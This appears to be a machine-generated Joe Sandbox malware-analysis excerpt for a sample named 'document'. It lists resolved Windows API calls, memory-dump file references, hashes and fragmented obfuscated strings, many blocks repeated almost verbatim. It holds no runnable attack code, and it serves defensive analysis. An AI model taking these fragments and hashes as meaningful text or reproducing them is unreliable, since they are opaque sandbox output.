                                                                    • Part of subcall function 004284C0: HeapAlloc.KERNEL32(00000000,00000140,004284A8,000003F8,?,0042E598,00000060), ref: 004284CD
                                                                  • HeapDestroy.KERNEL32(?,0042E598,00000060), ref: 004284B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 6464811ea9addaf19c19e5f0393c9d87aba79a32682558a56be755e4c38de286
                                                                  • Instruction ID: 3fe268917fd00d31aa756ebf7d8a68b1e22f7c153431ead6360d70d6e1d70485
                                                                  • Opcode Fuzzy Hash: 6464811ea9addaf19c19e5f0393c9d87aba79a32682558a56be755e4c38de286
                                                                  • Instruction Fuzzy Hash: A7E01A70B562129BEB147F316D0672E7AE49B84747F84587EB400C61A0FE788A459609
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(?,?), ref: 0041C738
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041C804
                                                                  • GetProcAddress.KERNEL32 ref: 0041C861
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041C8C5
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041C9A4
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041CA27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $#$$$$$$$$$&$&$&$&$($)$*$+$+$.$.$.$/$1$1$2$4$4$4$5$6$6$7$7$7$8$9$9$:$;$;$<$<$<$>$>$@$@$A$A$A$A$B$B$B$B$C$D$F$H$H$H$I$I$I$I$J$J$J$L$L$L$L$L$M$M$N$O$P$Q$R$R$S$S$S$S$S$S$S$T$T$T$T$W$W$W$W$X$X$Y$Z$[$[$\$^$_$_$`$`$`$`$a$a$b$c$c$c$d$d$d$d$d$e$e$e$e$e$e$f$f$g$g$g$h$h$h$h$i$i$k$l$m$n$n$n$n$n$n$n$o$o$o$p$p$q$r$r$r$s$s$t$t$t$t$t$t$u$u$v$v$w$w$w$x$x$x$y$z$|$|$~$~
                                                                  • API String ID: 2238633743-634024490
                                                                  • Opcode ID: c92be08d96a76fab994ce35617b86bcdcaf97940d9c7a17d779db1985a21b9f6
                                                                  • Instruction ID: f457ac551960ea605d3d070b3bc85a292eac30f70a1b7871ccb60a54743c72b9
                                                                  • Opcode Fuzzy Hash: c92be08d96a76fab994ce35617b86bcdcaf97940d9c7a17d779db1985a21b9f6
                                                                  • Instruction Fuzzy Hash: B8E2982000C7C2C9D332D63C984879FBFD51BA7228F584B9DE1E95A2E2D7A98149C777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$$$%$%$&$&$&$'$'$($)$)$)$*$*$+$-$-$-$.$.$.$/$/$1$2$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$>$?$?$@$B$C$D$E$E$E$E$E$E$F$F$G$H$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$N$O$O$P$P$T$T$U$V$V$W$Z$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$a$b$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$n$n$o$o$o$p$p$q$q$r$s$s$s$t$t$u$u$x$y$z${${$}$}$}$}
                                                                  • API String ID: 0-319044234
                                                                  • Opcode ID: fcd362075771919aa209d5a175f4e19b3383066e46c272e99d7fa23161f6263d
                                                                  • Instruction ID: 112317c9313a74c9b12a8399abeb6d4382841cb44c361794d62521e76ea744b4
                                                                  • Opcode Fuzzy Hash: fcd362075771919aa209d5a175f4e19b3383066e46c272e99d7fa23161f6263d
                                                                  • Instruction Fuzzy Hash: 1513B12000C7C29AD332C63898587DFBED55BA7328F588BADD1ED4A2D2D775020AD767
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,00000032), ref: 0041D1AD
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D28A
                                                                  • GetProcAddress.KERNEL32 ref: 0041D2E2
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D33A
                                                                  • GetProcAddress.KERNEL32(00000000,0000006B), ref: 0041D4A3
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041D53F
                                                                  • GetProcAddress.KERNEL32(00000000,0000009A), ref: 0041D637
                                                                  • GetProcAddress.KERNEL32(00000000,000000A5), ref: 0041D6A1
                                                                  • GetProcAddress.KERNEL32(00000000,000000EA), ref: 0041D718
                                                                  • GetProcAddress.KERNEL32(00000000,00000088), ref: 0041D80A
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041D967
                                                                  • LoadLibraryA.KERNEL32(00000040), ref: 0041D9FF
                                                                  • GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: #$$$$$$$$$&$&$($+$.$/$1$1$2$4$4$4$6$6$7$8$9$9$:$;$<$<$<$>$>$@$A$A$A$A$B$D$H$H$H$I$I$I$J$J$J$L$L$L$M$M$N$P$Q$R$S$S$S$S$S$S$S$T$T$T$W$W$W$W$X$X$Y$[$_$_$`$`$`$`$a$c$d$e$e$e$f$g$g$g$h$h$i$i$k$l$m$n$o$p$q$r$t$t$t$u$v$v$w$w$x$x$x$y$|$|$~
                                                                  • API String ID: 2238633743-1057226733
                                                                  • Opcode ID: 173a630b285c8d64dbb48f98fbb3aa5b36f8a7ac996510606186ed8d486715af
                                                                  • Instruction ID: 2d7c54381bbd094f02955be387350197a3f66cd921c6525618d4a2725f5bc4d0
                                                                  • Opcode Fuzzy Hash: 173a630b285c8d64dbb48f98fbb3aa5b36f8a7ac996510606186ed8d486715af
                                                                  • Instruction Fuzzy Hash: 5B829A2000C7C2C9D332C67C584879FBFD51BA7228F584B9DE1E95A2E2D7A9814AC777
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,74DF0440,74DF0440), ref: 0040C96E
                                                                  • lstrlenA.KERNEL32(?,?,?,00000002,?,00000000), ref: 0040CAE7
                                                                  • lstrlenA.KERNEL32(?), ref: 0040CAFA
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CC34
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 0040CCBA
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 0040CDD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: !$!$!$!$!$!$"$#$%$%$&$&$&$&u#&$'$'$'$($+$+$--%s$--%s--$.$.$/$/$0$0$0$0$0$1$2$3$3$4$4$4$4$4$5$5$6$7$8$8$8$8$8$9$9$9$:$:$:$:$:$<$<$<$<$<$=$>$?$@$A$A$E$E$E$F$K$M$P$P$Q$Q$T$U$U$W$X$X$Z$[$[$\$\$]$_$_$_$_$`$`$c$d$e$f$g$g$h$i$i$i$j$k$m$n$n$n$n$o$q$t$t$u$u$w$w$w$x$x$x
                                                                  • API String ID: 1659193697-105764249
                                                                  • Opcode ID: 6ebbdf2303aa1300f31e8ae64d91612264c5d94e1ec949d67e2f50ec83c66ff8
                                                                  • Instruction ID: 76a2d0d3a120653ea146fb598d041ca30ec9760fe042aa55d2c4b689ffa964e7
                                                                  • Opcode Fuzzy Hash: 6ebbdf2303aa1300f31e8ae64d91612264c5d94e1ec949d67e2f50ec83c66ff8
                                                                  • Instruction Fuzzy Hash: 40A2072110C7C1D9D332C738988878FBFD51BA7228F485B9DE1E85A2D2D7B98149C76B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$$$%$&$&$&$'$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$>$?$@$B$C$D$E$E$E$E$E$F$G$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$p$q$q$r$s$t$t$u$y${${$}$}$}$}
                                                                  • API String ID: 0-2726720408
                                                                  • Opcode ID: d90f52c8fe020ae98f048a66078bda6c6929cc3fb972793910aa825a6ba0364b
                                                                  • Instruction ID: c0d7f1d9a2f8d6b118605d4ad9cba7deefa6b9821a418fff6e8ca7fff8a3d635
                                                                  • Opcode Fuzzy Hash: d90f52c8fe020ae98f048a66078bda6c6929cc3fb972793910aa825a6ba0364b
                                                                  • Instruction Fuzzy Hash: 2CF2AF2000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$!$"$"$#$#$$$$$%$&$&$&$'$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$9$:$:$;$;$;$<$<$=$=$>$?$@$B$C$D$E$E$E$E$E$F$G$H$H$I$I$I$I$J$J$K$K$K$K$L$L$N$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$p$q$q$r$s$t$t$u$y${${$}$}$}$}
                                                                  • API String ID: 0-3452857728
                                                                  • Opcode ID: 1c6a306a2b6ec83f071b6c5e29ea358bffd991bd0d6fadaf44c47d54e099cf3b
                                                                  • Instruction ID: f89c03aa277b30708e93470f35b2be22918357344e2688cb743a074f04aa4e51
                                                                  • Opcode Fuzzy Hash: 1c6a306a2b6ec83f071b6c5e29ea358bffd991bd0d6fadaf44c47d54e099cf3b
                                                                  • Instruction Fuzzy Hash: 5AF2AF2000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$3$5$6$6$7$>$>$B$H$J$]$`$a$a$a$a$a$a$a$a$agy$b$b$b$c$c$c$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$eroon$g$g$g$g$g$gibor$h$h$h$h$h$h$herej$i$i$i$i$i$i$irdor$j$j$k$k$k$l$l$l$l$l$l$lybor$m$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$p$p$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$t$t$t$t$u$w$w$w$y$y$z$z
                                                                  • API String ID: 0-1641917991
                                                                  • Opcode ID: 2dc069aee45e8ea9a31442a3486fc2dfc51bd1cc8338bbaf5ed13638c82b4ca2
                                                                  • Instruction ID: c31594d21701e52a224cdcfe6db95929ccafb1db7881ef4c4193a4b74e5cc1ed
                                                                  • Opcode Fuzzy Hash: 2dc069aee45e8ea9a31442a3486fc2dfc51bd1cc8338bbaf5ed13638c82b4ca2
                                                                  • Instruction Fuzzy Hash: 5EA2AE2450D7C189E332C72884587DFBFD25BA6718F488E9EC4ED1B292C6BA0259C777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $&$'$'$)$)$,$,$,$,$,$0$0$0$0$3$3$3$4$4$6$8$:$:$:$;$=$?$A$A$C$E$E$E$E$E$H$I$I$J$L$L$L$N$N$N$O$O$O$P$P$P$T$T$T$Y$Y$Y:{$Y:{$Z$Z$Z$^$^$^$^$^$`$`$a$e$e$e$m$p$p$p$s$s$s$v$v$w$z$z${$|$|$|$|$|,T$|,T$|,T$}$}$~
                                                                  • API String ID: 0-75302382
                                                                  • Opcode ID: 9ebe39ba551fc4c6687707c0188dc31044f6a9c45a0b78eaedfd32ae9359fd65
                                                                  • Instruction ID: 0544d4bd05e75d62e2756a487d0dc6e4d92f5e832a14f0b3da5a45c8b404d5bb
                                                                  • Opcode Fuzzy Hash: 9ebe39ba551fc4c6687707c0188dc31044f6a9c45a0b78eaedfd32ae9359fd65
                                                                  • Instruction Fuzzy Hash: 2072A62010C7C189D322D73C945878FFFD55BA7228F585A9DE1E85B3D3C2AA8249C76B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $!$"$"$#$#$$$$$%$&$&$&$'$)$)$)$*$*$+$-$-$-$.$.$.$/$1$2$3$3$4$4$4$4$5$5$5$6$7$7$8$9$9$:$:$;$;$;$<$<$=$>$?$@$B$C$D$E$E$E$E$F$G$H$I$I$I$I$J$J$K$K$K$K$L$L$O$O$P$P$T$T$V$V$Z$Z$Z$Z$[$[$[$\$]$^$^$_$_$_$_$_$`$a$c$c$d$d$d$d$e$f$g$g$h$i$i$j$j$l$l$n$o$o$o$p$q$q$r$s$t$t$u${${$}$}$}
                                                                  • API String ID: 0-3297533030
                                                                  • Opcode ID: e80a43674b860d90563689f352579e04e32f56a1759b67cdd7fa77c80c7b27f3
                                                                  • Instruction ID: 082fff56f21fc62f50753e24676e63cce44abcfe45e5a024b0e2de527967505b
                                                                  • Opcode Fuzzy Hash: e80a43674b860d90563689f352579e04e32f56a1759b67cdd7fa77c80c7b27f3
                                                                  • Instruction Fuzzy Hash: 08E2A02000C7C299D332C63898587DFBFD55BA7328F588BADD1ED4A2E2D675020AD767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
